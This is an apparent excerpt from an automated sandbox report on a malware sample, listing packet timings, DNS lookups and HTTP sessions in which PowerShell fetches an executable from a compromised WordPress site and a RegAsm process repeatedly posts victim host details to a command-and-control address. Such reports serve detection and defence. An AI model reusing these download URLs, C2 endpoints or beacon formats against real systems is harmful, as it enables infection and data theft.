                                                                                        Jan 5, 2021 19:07:16.026987076 CET8049344185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:16.027359009 CET4934480192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:16.105011940 CET8049344185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:16.112185955 CET8049344185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:16.112215996 CET8049344185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:16.112481117 CET4934480192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:16.112554073 CET4934480192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:16.161082983 CET8049344185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:16.266757011 CET4934580192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:16.315412998 CET8049345185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:16.315521002 CET4934580192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:16.321602106 CET4934580192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:16.386521101 CET8049345185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:16.386634111 CET4934580192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:16.465064049 CET8049345185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:16.490418911 CET8049345185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:16.490441084 CET8049345185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:16.490525007 CET4934580192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:16.490566015 CET4934580192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:16.539041042 CET8049345185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:16.636053085 CET4934680192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:16.684684038 CET8049346185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:16.684820890 CET4934680192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:16.691139936 CET4934680192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:16.761317968 CET8049346185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:16.761456966 CET4934680192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:16.823837996 CET8049346185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:16.849535942 CET8049346185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:16.849559069 CET8049346185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:16.849862099 CET4934680192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:16.849920988 CET4934680192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:16.898360014 CET8049346185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.015758991 CET4934780192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.064762115 CET8049347185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.064882994 CET4934780192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.070971966 CET4934780192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.136651993 CET8049347185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.136715889 CET4934780192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.216365099 CET8049347185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.241789103 CET8049347185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.241806030 CET8049347185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.242048025 CET4934780192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.242084026 CET4934780192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.290882111 CET8049347185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.390456915 CET4934880192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.439147949 CET8049348185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.439229012 CET4934880192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.441718102 CET4934880192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.512830973 CET8049348185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.512903929 CET4934880192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.574065924 CET8049348185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.595690966 CET8049348185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.595709085 CET8049348185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.595978022 CET4934880192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.597513914 CET4934880192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.645899057 CET8049348185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.760078907 CET4934980192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.808722973 CET8049349185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.808861017 CET4934980192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.814657927 CET4934980192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.886374950 CET8049349185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.886547089 CET4934980192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.964401960 CET8049349185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.974678993 CET8049349185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.974699020 CET8049349185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:17.975008011 CET4934980192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:17.975052118 CET4934980192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:18.023576975 CET8049349185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:18.115487099 CET4935080192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:18.164140940 CET8049350185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:18.164235115 CET4935080192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:18.170245886 CET4935080192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:18.245878935 CET8049350185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:18.245968103 CET4935080192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:18.324021101 CET8049350185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:18.342972994 CET8049350185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:18.342991114 CET8049350185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:18.343251944 CET4935080192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:18.343328953 CET4935080192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:18.391840935 CET8049350185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:18.492227077 CET4935180192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:18.540771008 CET8049351185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:18.540899992 CET4935180192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:18.546783924 CET4935180192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:18.620821953 CET8049351185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:18.621004105 CET4935180192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:18.683228970 CET8049351185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:18.726488113 CET8049351185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:18.726543903 CET8049351185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:18.726808071 CET4935180192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:18.726893902 CET4935180192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:18.775402069 CET8049351185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:18.885631084 CET4935280192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:18.934432030 CET8049352185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:18.934586048 CET4935280192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:18.940629005 CET4935280192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:19.011441946 CET8049352185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:19.011570930 CET4935280192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:19.074079037 CET8049352185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:19.100817919 CET8049352185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:19.100860119 CET8049352185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:19.101047039 CET4935280192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:19.101109982 CET4935280192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:19.149830103 CET8049352185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:19.259362936 CET4935380192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:19.307862043 CET8049353185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:19.308063984 CET4935380192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:19.314073086 CET4935380192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:19.386833906 CET8049353185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:19.386976957 CET4935380192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:19.464514017 CET8049353185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:19.472804070 CET8049353185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:19.472846031 CET8049353185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:19.473216057 CET4935380192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:19.473258972 CET4935380192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:19.521998882 CET8049353185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:19.627652884 CET4935480192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:19.676302910 CET8049354185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:19.676390886 CET4935480192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:19.678881884 CET4935480192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:19.745924950 CET8049354185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:19.746011019 CET4935480192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:19.823863983 CET8049354185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:19.836988926 CET8049354185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:19.837122917 CET8049354185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:19.837145090 CET4935480192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:19.837182999 CET4935480192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:19.885761976 CET8049354185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.005683899 CET4935580192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.054624081 CET8049355185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.054822922 CET4935580192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.060760021 CET4935580192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.136897087 CET8049355185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.136992931 CET4935580192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.214624882 CET8049355185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.222455978 CET8049355185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.222628117 CET8049355185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.222719908 CET4935580192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.223773003 CET4935580192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.271420002 CET8049355185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.383287907 CET4935680192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.431929111 CET8049356185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.432050943 CET4935680192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.437124968 CET4935680192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.511676073 CET8049356185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.511753082 CET4935680192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.573920012 CET8049356185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.607773066 CET8049356185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.607801914 CET8049356185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.607991934 CET4935680192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.608021975 CET4935680192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.656537056 CET8049356185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.762762070 CET4935780192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.811413050 CET8049357185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.811614990 CET4935780192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.817266941 CET4935780192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.886575937 CET8049357185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.886699915 CET4935780192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.964807034 CET8049357185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.984601021 CET8049357185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.984644890 CET8049357185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:20.984993935 CET4935780192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:20.985939026 CET4935780192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:21.035293102 CET8049357185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:21.143081903 CET4935880192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:21.192502975 CET8049358185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:21.192637920 CET4935880192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:21.198559999 CET4935880192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:21.277319908 CET8049358185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:21.277508974 CET4935880192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:21.356806040 CET8049358185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:21.387078047 CET8049358185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:21.387130976 CET8049358185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:21.387304068 CET4935880192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:21.387351036 CET4935880192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:21.436928034 CET8049358185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:21.517699003 CET4935980192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:21.566459894 CET8049359185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:21.566590071 CET4935980192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:21.572190046 CET4935980192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:21.636542082 CET8049359185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:21.636636019 CET4935980192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:21.714544058 CET8049359185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:21.741503954 CET8049359185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:21.741559982 CET8049359185.206.215.56192.168.2.22
                                                                                        Jan 5, 2021 19:07:21.741643906 CET4935980192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:21.741707087 CET4935980192.168.2.22185.206.215.56
                                                                                        Jan 5, 2021 19:07:21.790384054 CET8049359185.206.215.56192.168.2.22

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jan 5, 2021 19:05:20.671252966 CET5219753192.168.2.228.8.8.8
                                                                                        Jan 5, 2021 19:05:20.727847099 CET53521978.8.8.8192.168.2.22
                                                                                        Jan 5, 2021 19:05:21.293368101 CET5309953192.168.2.228.8.8.8
                                                                                        Jan 5, 2021 19:05:21.351258039 CET53530998.8.8.8192.168.2.22
                                                                                        Jan 5, 2021 19:05:21.357091904 CET5283853192.168.2.228.8.8.8
                                                                                        Jan 5, 2021 19:05:21.415157080 CET53528388.8.8.8192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.378812075 CET6120053192.168.2.228.8.8.8
                                                                                        Jan 5, 2021 19:05:22.447736979 CET53612008.8.8.8192.168.2.22

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                        Jan 5, 2021 19:05:20.671252966 CET192.168.2.228.8.8.80xad13Standard query (0)cutt.lyA (IP address)IN (0x0001)
                                                                                        Jan 5, 2021 19:05:22.378812075 CET192.168.2.228.8.8.80x1175Standard query (0)bighoreca.nlA (IP address)IN (0x0001)

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                        Jan 5, 2021 19:05:20.727847099 CET8.8.8.8192.168.2.220xad13No error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                                                                                        Jan 5, 2021 19:05:20.727847099 CET8.8.8.8192.168.2.220xad13No error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
                                                                                        Jan 5, 2021 19:05:20.727847099 CET8.8.8.8192.168.2.220xad13No error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)
                                                                                        Jan 5, 2021 19:05:22.447736979 CET8.8.8.8192.168.2.220x1175No error (0)bighoreca.nl83.172.144.37A (IP address)IN (0x0001)

                                                                                        HTTP Request Dependency Graph

                                                                                        • bighoreca.nl
                                                                                        • 185.206.215.56

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        0192.168.2.224916783.172.144.3780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:05:22.500040054 CET70OUTGET /wp-content/themes/index/QPR-3067.exe HTTP/1.1
                                                                                        Host: bighoreca.nl
                                                                                        Connection: Keep-Alive
                                                                                        Jan 5, 2021 19:05:22.551645994 CET71INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Tue, 05 Jan 2021 18:05:22 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 938440
                                                                                        Last-Modified: Tue, 05 Jan 2021 14:03:47 GMT
                                                                                        Connection: keep-alive
                                                                                        ETag: "5ff471c3-e51c8"
                                                                                        X-Powered-By: PleskLin
                                                                                        Accept-Ranges: bytes
                                                                                        Jan 5, 2021 19:05:22.551749945 CET72INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELlt.L @ `
                                                                                        Jan 5, 2021 19:05:22.551772118 CET72INData Raw: 00 06
                                                                                        Data Ascii:
                                                                                        Jan 5, 2021 19:05:22.551798105 CET74INData Raw: 74 0b 00 00 02 26 de 0e 26 28 1a 00 00 06 74 11 00 00 02 26 de 00 00 de 16 00 00 28 1a 00 00 06 74 13 00 00 02 26 00 fe 0c 04 00 2d ed de 00 00 38 92 00 00 00 00 00 fe 0c 00 00 2d 0d 28 1a 00 00 06 74 06 00 00 02 26 2b 1f 00 28 1a 00 00 06 74 15
                                                                                        Data Ascii: t&&(t&(t&-8-(t&+(t&(t&Z-(t&(t&+.(t&+6+&&(t
                                                                                        Jan 5, 2021 19:05:22.551816940 CET74INData Raw: 00 00
                                                                                        Data Ascii:
                                                                                        Jan 5, 2021 19:05:22.551848888 CET75INData Raw: 73 02 00 00 13 00 00 00 00 00 00 00 00 00 00 00 dd 01 00 00 6d 00 00 00 4a 02 00 00 3f 00 00 00 06 00 00 01 00 00 00 00 97 02 00 00 19 00 00 00 b0 02 00 00 0e 00 00 00 06 00 00 01 02 00 00 00 96 02 00 00 2b 00 00 00 c1 02 00 00 16 00 00 00 00 00
                                                                                        Data Ascii: smJ?+6ZvP!q:HW?
                                                                                        Jan 5, 2021 19:05:22.551868916 CET75INData Raw: fe 0e
                                                                                        Data Ascii:
                                                                                        Jan 5, 2021 19:05:22.551893950 CET76INData Raw: 0a 00 fe 0c 0a 00 fe 0e 0a 00 2b 0c 00 28 1a 00 00 06 74 0e 00 00 02 26 00 de 1e 00 00 28 1a 00 00 06 74 06 00 00 02 26 28 1a 00 00 06 74 0c 00 00 02 26 00 14 2d e5 de 00 00 de 00 00 00 2b 1e 00 00 28 1a 00 00 06 74 04 00 00 02 26 de 0e 00 28 1a
                                                                                        Data Ascii: +(t&(t&(t&-+(t&(t&-(t-(t&(t&(t&-&(t-(t&
                                                                                        Jan 5, 2021 19:05:22.551913023 CET77INData Raw: 00 28
                                                                                        Data Ascii: (
                                                                                        Jan 5, 2021 19:05:22.602938890 CET78INData Raw: 1a 00 00 06 74 06 00 00 02 26 de 0e 26 28 1a 00 00 06 74 01 00 00 02 26 de 00 00 de 00 00 de 2a 00 28 1a 00 00 06 74 07 00 00 01 2d 1a 00 fe 0c 06 00 fe 0e 06 00 de 0e 00 28 1a 00 00 06 74 0c 00 00 02 26 de 00 00 00 de 00 00 00 00 00 14 fe 0e 11
                                                                                        Data Ascii: t&&(t&*(t-(t&-#&(t&(t,-(t&--(t&+2\-(t&
                                                                                        Jan 5, 2021 19:05:22.602984905 CET78INData Raw: 00 00
                                                                                        Data Ascii:


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        1192.168.2.2249168185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:07.649980068 CET1143OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 176
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:07.715271950 CET1143OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: 'ckav.ruAlbus216554ALBUS-PCk0DE4229FCF97F5879F50F8FD3qUHHF
                                                                                        Jan 5, 2021 19:06:07.837934971 CET1143INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:06 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 15
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        10192.168.2.2249177185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:11.296993017 CET1155OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:11.370929956 CET1155OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:11.461579084 CET1155INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:10 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        100192.168.2.2249267185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:46.730741978 CET1273OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:46.808608055 CET1274OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:46.897286892 CET1274INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:45 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        101192.168.2.2249268185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:47.102634907 CET1275OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:47.167920113 CET1275OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:47.257102013 CET1275INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:46 GMT
